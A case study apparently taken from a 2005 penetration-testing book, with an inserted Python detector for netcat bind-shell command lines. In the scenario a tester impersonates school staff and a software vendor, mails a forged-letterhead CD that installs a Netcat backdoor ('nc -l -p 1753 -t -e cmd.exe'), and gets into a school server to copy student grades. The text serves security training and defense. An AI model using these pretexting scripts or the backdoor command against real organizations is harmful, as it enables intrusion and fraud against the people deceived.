Case Study


In this case study, a penetration tester named Jimmy is hired to perform social engineering against a public elementary school. The goal is to gain access to the school systems to change student grades.

The first step is to find out what type of grading software this school uses. Jimmy begins by researching common grading software on the Internet. He discovers products like Class Action Gradebook, AutoGrade, Grade Genie, ThinkWave, and Next 5 Grading software. Jimmy also browses educational message boards, like the one at familyeducation.com, that discuss the use of technology in schools. Exploring the area, Jimmy finds out about a nearby elementary school named Washington Elementary. This knowledge helps Jimmy sound well-informed when making phone calls.

Jimmy calls the school and asks to speak to the person in charge of technology. He is connected with a gentleman named Chris. The conversation goes as follows:

Jimmy: Hello, Chris? My name is Jimmy, and I am over at Washington Elementary. I just got assigned responsibility over our technology over here, but, to be honest, I do not know much about technology, so I was wondering if you could help me.

At this point Jimmy has established the need. Because people generally like to help others, Jimmy knows that Chris would probably be happy to help.

Chris: Hi, Jimmy. So you are over at Washington, huh? What happened to Kathy? I thought she was in charge of technology over there.

Jimmy: Yeah, she still oversees the management, but now they are expanding her role. I work directly under her. She is a great person to work for.

Although it appears as if Jimmy might have gotten caught, he plays it off by saying Kathy has been promoted. Jimmy also appeals to Chris by saying something positive about Kathy to make the conversation lighthearted.

Jimmy: Anyway, Kathy has asked me to come up with some new grading software. I have been looking at Gradebook, AutoGrade, and Grade Genie, but I am not sure which is the most flexible. Which one do you guys use?

Jimmy demonstrates his knowledge of grading software to remove any doubts about his background in education. Jimmy also asks Chris which software is the most flexible because the message boards he looked at name flexibility as the top priority when searching for grading software.

Chris: We have been using Gradebook. We are pretty happy with it.

From this point, Jimmy proceeds to ask questions about the software based on similar questions he read on message boards.

When the conversation is over, Jimmy knows the type of software used by the school and that the name of the person in charge of technology is Chris.

For the next phase, Jimmy chooses someone else to contact Chris because Chris would recognize Jimmy's voice. Because Chris is a man, and because the best social engineering scenarios are with people of the opposite sex, Jimmy asks his coworker Janet to make a phone call and act like a support representative at ThinkWave. Janet waits a couple of weeks before contacting Chris so that the call does not appear too conspicuous.

Janet: Hello, Chris? I am Janet with ThinkWave Technology. We were wondering if you would like to participate in our customer improvement program. As an incentive, you receive 20 percent discounts on future upgrades.

Because most public schools are struggling for money, it is a safe assumption that Chris would be motivated by saving money.

Chris: Sure. What do I have to do?

Janet: Well, I will send you reporting software to put on your server. Included with this will be instructions on how to configure it. Any time an error message appears, a report is generated and sent back to us. No personal information is sent, just the type of computer, when it happened, and what processes were running when the error occurred. By collecting these reports from our customers, we hope to alleviate bugs in future software releases.

Chris: Sounds good!

After this conversation, Jimmy downloads the ThinkWave logo from its website and creates letterhead stationery with the logo. Jimmy looks up the company address and sends a package to Chris with a return address of ThinkWave. The package contains a CD with the Netcat utility and a letter that says the following:

Dear Chris,

Thank you for your participation in our customer improvement program. We are certain your assistance will help us improve future releases of our product. Included with this letter is a CD that contains reporting software. Any time an error occurs, a report will be generated and sent back to us. I want to assure you that no personal data will be sent.

To start up this reporting program, pop the CD into the CD-ROM drive of your server. It should automatically start the setup program. If not, go to the root of the CD-ROM drive and start setup.exe.

This reporting software uses TCP port 1753. You will need to open this port on your firewall. Consult your firewall documentation on how to permit this port.

By enrolling in this program, you will automatically receive 20 percent off future upgrades. We appreciate your continued business and look forward to serving you in the future.


          Sincerely,
          Janet Smith
          Support Representative
          ThinkWave
          "Where teachers, students, and parents communicate"

On the CD is a setup utility that Jimmy created that installs Netcat onto the root of the server hard drive. Netcat is a backdoor Trojan application that provides Jimmy with remote access into the server. The install script starts Netcat with the following parameters:

C:\nc -l -p 1753 -t -e cmd.exe

The -l tells Netcat to go into listening mode. The -p 1753 tells Netcat to listen on port 1753. The -t tells Netcat to listen for Telnet requests, and -e cmd.exe tells Netcat to open a command shell.
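
For defenders, the listener command above has a recognizable shape in process-creation logs: a listen flag combined with -e pointing at a command interpreter. The following Python is an added example, not part of the original case study; the log format (timestamp|host|command line), the sample records, the host name SRV01, and the function names are all constructed for illustration.

```python
import shlex
from ntpath import basename  # Windows path rules; also splits on "/"

SHELLS = {"cmd", "cmd.exe", "command.com", "powershell.exe", "sh", "bash"}
TAKES_ARG = set("egGiopsw")  # netcat short options that consume a value

def parse_short_opts(argv):
    """getopt-style parse that understands clusters such as -Ldp 1753."""
    opts, it = {}, iter(argv)
    for tok in it:
        if len(tok) < 2 or not tok.startswith("-"):
            continue
        for j, flag in enumerate(tok[1:], start=2):
            if flag not in TAKES_ARG:
                opts[flag] = True
                continue
            # value is glued on (-p1753) or is the next token (-p 1753)
            opts[flag] = tok[j:] if j < len(tok) else next(it, "")
            break
    return opts

def bind_shell_port(cmdline):
    """Port number if cmdline listens AND execs a shell; 0 if no -p; else None."""
    argv = shlex.split(cmdline, posix=False)  # posix=False keeps backslashes
    opts = parse_short_opts(argv[1:])
    prog = basename(str(opts.get("e", "")).strip('"')).lower()
    if not (("l" in opts or "L" in opts) and prog in SHELLS):
        return None
    port = str(opts.get("p", ""))
    return int(port) if port.isdigit() else 0

# Constructed process-creation records: timestamp|host|command line
SAMPLE_LOG = r"""2004-06-01T16:11:40|SRV01|D:\setup.exe
2004-06-01T16:11:52|SRV01|C:\nc -l -p 1753 -t -e cmd.exe
2004-06-02T09:03:10|SRV01|C:\WINNT\system32\ping.exe -l 1753 10.0.0.1
2004-06-03T22:15:01|SRV01|C:\report.exe -Ldp 1753 -e C:\WINNT\system32\cmd.exe
2004-06-04T08:00:00|SRV01|C:\nc -l -p 8080""".splitlines()

def scan(lines):
    """Return (timestamp, host, port) for every record that matches."""
    rows = (line.split("|", 2) for line in lines)
    return [(ts, host, bind_shell_port(cmd)) for ts, host, cmd in rows
            if bind_shell_port(cmd) is not None]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Matching on the argument shape rather than the image name is what flags the renamed binary in the fourth constructed record, while the ping command that merely contains -l is ignored.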

After a couple of days, Jimmy has Janet call Chris back.

Janet: This is Janet. I am just calling to see if you had any problems installing our reporting software.

Chris: Nope, none at all.

Janet: Wonderful. That is what we like to hear. Now we just need to know your external IP address so that when we receive the reports, we know it is coming from you.

Chris: Sure. Let me check. Okay, it should be 200.100.50.25.

Janet: Thanks! If you ever need anything, do not hesitate to call us. Do you have our support number?

Chris: Yes, I think I do.

Jimmy had already looked up the phone number so that Janet could offer it to appear helpful and more legitimate to Chris.

Now it is time to attempt access. Jimmy goes to his computer and types the following:

C:\nc 200.100.50.25 1753

This command attempts to open a connection to the school server on port 1753. Sure enough, when Jimmy checks his screen, he has gained access into the server. He executes a directory listing to make sure:

C:\dir
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8496-8025
 Directory of C:\
06/01/2004 04:11 PM    <DIR>      ThinkWave
04/14/2004 03:11 PM    <DIR>      WINNT
04/14/2004 07:43 AM               0 AUTOEXEC.BAT
<output removed>

Now Jimmy has full access to the school server. He begins to navigate to the grading software and copies the data to his local computer. Jimmy logs the entire process and captures screenshots to add to his report later.

Jimmy looks at one of the files named 010521.edt using a text editor and discovers that it is the grade file for a student:

010521   Spelling             A
010521   Mathematics          B
010521   Physical Education   A

With only a couple of phone calls and a quick command, Jimmy was able to gain access to the school server, where all student grades were located.



    Penetration Testing and Network Defense
    ISBN: 1587052083
    EAN: 2147483647
    Year: 2005
    Pages: 209
